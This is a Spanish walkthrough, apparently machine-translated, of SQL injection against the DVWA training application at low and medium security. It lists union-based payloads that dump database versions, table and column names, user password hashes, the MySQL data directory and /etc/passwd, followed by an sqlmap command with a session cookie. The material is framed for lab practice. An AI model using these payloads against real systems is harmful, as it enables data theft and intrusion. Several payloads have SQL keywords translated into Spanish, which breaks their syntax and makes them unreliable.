nivel Seguridad = Baja 99 o 1 = 1 – mostrará todos los registros 99 o 1 = 1 union select 1,2,3 – mostrará «Las sentencias SELECT utilizadas tienen un número diferente de columnas» mensaje de error 99 o 1 = 1 union select 1,2 – ningún mensaje de error pero mostrar todos los registros 99 o 1 = 1 union select null, null – ningún mensaje de error pero mostrar todos los registros 99 o 1 = 1 union select version (), base de datos () – se mostrará la versión de MySQL y el nombre de base de datos – DVWA 99 o 1 = 1 union select null, el usuario () o 99 o 1 = 1 union select user (), null – mostrará al usuario actual de la base de datos 99 o 1 = 1 union select nulo, nombre_tabla de INFORMATION_SCHEMA . tablas – Se muestran todos los nombres de tabla 99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde donde INFORMATION_SCHEMA.COLUMNS nombre_tabla = 'users' – se mostrará la lista de columnas de tabla de usuarios 99 o 1 = 1 union select null, concat (first_name, 0x0a, password) de usuarios – que estamos buscando first_name tabla de usuarios y contraseña 99 o 1 = 1 union select null, @ @ datadir – mostrará el directorio mysql 99 o 1 = 1 union select todo nulo, load_file ('/ etc / passwd') – mostrará el contenido de / etc / passwd Nivel de seguridad = medio 99 o 1 = 1 – mostrará todos los registros 99 o 1 = 1 union select 1,2,3 – mostrará «Las sentencias SELECT utilizadas tienen un número diferente de columnas» error mensaje 99 o 1 = 1 union select 1,2 – ningún mensaje de error pero mostrar todos los registros 99 o 1 = 1 union select null, null – ningún mensaje de error pero mostrar todos los registros 99 o 1 = 1 union select version (), base de datos () – se mostrará la versión de MySQL y el nombre de base de datos – DVWA 99 o 1 = 1 union select null, el usuario () o 99 o 1 = 1 union select user (), null – mostrará al usuario actual de la base de datos 99 o 1 = 1 union select nulo, nombre_tabla de INFORMATION_SCHEMA.TABLES – Se muestran todos los nombres de tabla 99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde INFORMATION_SCHEMA.COLUMNS – desde donde no se puede utilizar la cláusula, todo nombre de la columna debe aparecer o 99 o 1 = 1 union select null, concat (nombre_tabla, 0x0a, column_name) desde INFORMATION_SCHEMA.COLUMNS donde nombre_tabla = 0x7573657273 – donde 0x7573657273 es el valor hexadecimal de «usuarios» 99 o 1 = 1 union select null, concat (first_name, 0x0a, password) de los usuarios – que estamos buscando first_name tabla de usuarios y contraseña 99 o 1 = 1 union select null, @ @ datadir – mostrará el directorio mysql sqlmap para la Seguridad = Baja / sqlmap.py-u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit #" - cookies = "security = bajo;. PHPSESSID = rc1vt2hcper8nlpau9mh2v4304 "- string =" Apellido "-T usuarios - columnas En Seguridad = medio es similar Eso es todo.! ¡Hasta luego!
Posts Relacionados
LINUX Dominar la Administración del Sistema 3°Edición [PDF]
BackBox Linux 4.1, nueva versión de esta distro de seguridad- ¿Google Drive para Linux? Quién sabe…
- Quantum OS cambia su nombre a Papyros y evoluciona el Material Design
- Implementar ACLs: Descripción, comandos y ejemplos.
- Libreboot X200, otro portátil avalado por la FSF